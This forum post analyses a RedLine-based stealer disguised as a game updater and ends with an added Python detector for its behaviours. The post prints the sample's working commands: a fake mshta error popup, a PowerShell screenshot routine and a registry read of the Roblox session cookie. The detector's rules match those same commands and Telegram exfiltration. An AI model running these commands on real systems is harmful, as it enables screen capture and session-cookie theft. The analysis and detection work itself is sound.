Hello everyone!
Did a bit of research.
It's basically a RedLine stealer, plus some other no-name grabbers and stealers. When you open the "updater" it downloads m2.exe / metin2.exe to the temp folder from a Chinese host and opens them; those download RedLine configs, then scan the registry, PC name, installed apps and browser extensions, and steal the passwords and user data.
Bob.exe does the same thing, but it connects to the Telegram API, then sends your info there.
It's a shitty ass py2exe.
The fake error msg comes from here: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Unsupported WINDOWS Version or outdated CLIENT files. ERRORCODE 9042', 0, 'Unsupported Version', 0+16);close()"
# Compiles a C# helper that captures every attached display, then saves each one as "Display (N).png"
$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot {
    public static List<Bitmap> CaptureScreens() {
        var results = new List<Bitmap>();
        var allScreens = Screen.AllScreens;
        foreach (Screen screen in allScreens) {
            try {
                Rectangle bounds = screen.Bounds;
                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) {
                    using (Graphics graphics = Graphics.FromImage(bitmap)) {
                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                    }
                    results.Add((Bitmap)bitmap.Clone());
                }
            } catch (Exception) {
                // Handle any exceptions here
            }
        }
        return results;
    }
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()
for ($i = 0; $i -lt $screenshots.Count; $i++) {
    $screenshot = $screenshots[$i]
    $screenshot.Save("./Display ($($i+1)).png")
    $screenshot.Dispose()
}
lmao
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY (PID: 6504)
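As an added example (not from the original post, and not code from the sample it describes), here is a small Python detector that turns the behaviours listed above into rules and runs them over constructed process-creation log lines: the mshta inline-JavaScript popup, the Add-Type/CopyFromScreen screenshot capture, the .ROBLOSECURITY registry read, an executable launched from the Temp folder, and a Telegram Bot API URL. The `pid=... image=... cmdline=...` log format, the PIDs, the paths and the `<PLACEHOLDER_TOKEN>` are all assumptions.

```python
import re

# Constructed process-creation log lines (not from the original post); paths,
# PIDs and the Telegram token placeholder are made up. Each line mirrors one
# behaviour the post describes, plus one benign line as a control.
SAMPLE_EVENTS = [
    "pid=6501 image=C:\\Windows\\System32\\mshta.exe cmdline=mshta \"javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Unsupported WINDOWS Version or outdated CLIENT files. ERRORCODE 9042', 0, 'Unsupported Version', 0+16);close()\"",
    "pid=6502 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline=powershell -NoProfile -Command \"$source = @' public class Screenshot { /* ... */ graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); /* ... */ } '@; Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms; [Screenshot]::CaptureScreens()\"",
    "pid=6504 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline=powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY",
    "pid=6505 image=C:\\Users\\victim\\AppData\\Local\\Temp\\m2.exe cmdline=\"C:\\Users\\victim\\AppData\\Local\\Temp\\m2.exe\"",
    "pid=6506 image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline=powershell Invoke-WebRequest -Uri https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/getMe",
    "pid=6510 image=C:\\Windows\\System32\\notepad.exe cmdline=notepad.exe C:\\Users\\victim\\notes.txt",
]

# Assumed log layout: three space-separated fields, cmdline runs to end of line.
EVENT_RE = re.compile(r"^pid=(\d+)\s+image=(\S+)\s+cmdline=(.*)$")

# (rule name, pattern) pairs; each keys on one behaviour from the post.
RULES = [
    ("mshta_inline_javascript", re.compile(r'mshta(\.exe)?\s+"?javascript:', re.I)),
    ("wscript_shell_popup", re.compile(r"ActiveXObject\('WScript\.Shell'\).*\.Popup\(", re.I)),
    ("powershell_screen_capture", re.compile(r"Add-Type.*CopyFromScreen|CopyFromScreen.*Add-Type", re.I)),
    ("roblox_cookie_registry_read", re.compile(r"RobloxStudioBrowser.*\.ROBLOSECURITY", re.I)),
    ("exe_launched_from_temp", re.compile(r'\\Temp\\[^\\\s"]+\.exe', re.I)),
    ("telegram_bot_api_url", re.compile(r"api\.telegram\.org/bot", re.I)),
]


def parse_event(line):
    """Split one 'pid=... image=... cmdline=...' line into its fields, or None."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    return {"pid": int(m.group(1)), "image": m.group(2), "cmdline": m.group(3)}


def scan_events(lines):
    """Return {pid: [names of rules that matched]} for every event that hit a rule."""
    hits = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        # Match on the image path too, so a binary run from Temp is caught
        # even when its command line carries nothing suspicious.
        text = ev["image"] + " " + ev["cmdline"]
        matched = [name for name, rx in RULES if rx.search(text)]
        if matched:
            hits[ev["pid"]] = matched
    return hits


if __name__ == "__main__":
    for pid, names in sorted(scan_events(SAMPLE_EVENTS).items()):
        print(f"PID {pid}: {', '.join(names)}")
```

The mshta popup line trips two rules at once, which is a useful property for triage: a single mshta invocation is common on many hosts, but mshta plus an inline WScript.Shell popup rarely is, so requiring two hits on one PID cuts noise without losing this sample.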